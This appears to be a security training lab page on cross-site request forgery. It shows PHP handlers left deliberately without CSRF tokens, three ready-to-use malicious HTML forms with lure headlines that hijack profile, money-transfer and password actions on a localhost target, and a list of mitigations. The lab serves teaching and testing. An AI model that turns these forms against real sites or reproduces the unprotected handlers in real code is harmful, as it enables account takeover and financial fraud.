Lab 1: Basic CSRF Attack

Difficulty: Low

Lab Overview

This lab demonstrates a basic CSRF vulnerability where sensitive actions like profile updates, money transfers, and password changes lack proper CSRF protection. An attacker can trick a user into performing these actions without their knowledge.

Objective: Create malicious HTML forms or use other techniques to perform unauthorized actions on behalf of the victim user.

Vulnerable Code

// Vulnerable: No CSRF protection
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update_profile'])) {
    $username = $_POST['username'] ?? $user_profile['username'];
    $email = $_POST['email'] ?? $user_profile['email'];
    // Update profile without CSRF token validation
    $_SESSION['user_profile'] = [
        'username' => $username,
        'email' => $email,
        // ... other fields
    ];
}

// Vulnerable: Money transfer without CSRF protection
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['transfer_money'])) {
    $amount = (float)($_POST['amount'] ?? 0);
    $recipient = $_POST['recipient'] ?? '';
    // Process transfer without CSRF validation
    $_SESSION['user_profile']['balance'] -= $amount;
}

User Profile

Current Profile

Username: victim_user

Email: victim@example.com

Role: user

Balance: $1,000.00

Phone: +1-555-0123

Address: 123 Main St, City, State

Profile Update

Money Transfer

Password Change

Vulnerability Details

Type: Cross-Site Request Forgery (CSRF)
Severity: High
Method: POST
Issue: Missing CSRF protection on sensitive actions

CSRF Attack Examples

Create these malicious HTML files to test CSRF:

profile_csrf.html - Profile update attack
transfer_csrf.html - Money transfer attack
password_csrf.html - Password change attack

CSRF Attack Payloads

Create these malicious HTML files to test CSRF attacks:

1. Profile Update CSRF (profile_csrf.html):

<html>
<body>
    <h1>You won a prize! Click here to claim it!</h1>
    <form action="http://localhost/test/csrf/1.php" method="POST">
        <input type="hidden" name="update_profile" value="1">
        <input type="hidden" name="username" value="hacked_user">
        <input type="hidden" name="email" value="hacker@evil.com">
        <input type="hidden" name="phone" value="+1-555-9999">
        <input type="hidden" name="address" value="Evil Street, Hacker City">
        <input type="submit" value="Claim Prize">
    </form>
</body>
</html>

2. Money Transfer CSRF (transfer_csrf.html):

<html>
<body>
    <h1>Special offer! Get $100 bonus!</h1>
    <form action="http://localhost/test/csrf/1.php" method="POST">
        <input type="hidden" name="transfer_money" value="1">
        <input type="hidden" name="amount" value="500">
        <input type="hidden" name="recipient" value="attacker@evil.com">
        <input type="submit" value="Get Bonus">
    </form>
</body>
</html>

3. Password Change CSRF (password_csrf.html):

<html>
<body>
    <h1>Security update required!</h1>
    <form action="http://localhost/test/csrf/1.php" method="POST">
        <input type="hidden" name="change_password" value="1">
        <input type="hidden" name="new_password" value="hacked123">
        <input type="hidden" name="confirm_password" value="hacked123">
        <input type="submit" value="Update Security">
    </form>
</body>
</html>

Real-World Attack Scenarios

Unauthorized profile modifications and personal information changes
Unauthorized financial transactions and money transfers
Password changes and account takeovers
Privilege escalation and administrative access
Data exfiltration and unauthorized data access
Compliance violations and security breaches

Mitigation Strategies

Implement CSRF tokens for all state-changing operations
Use SameSite cookie attributes to prevent cross-site requests
Implement proper request validation and authorization checks
Use double-submit cookie pattern for additional protection
Implement proper session management and timeout
Regular security testing and vulnerability assessments
Monitor for unusual request patterns and anomalies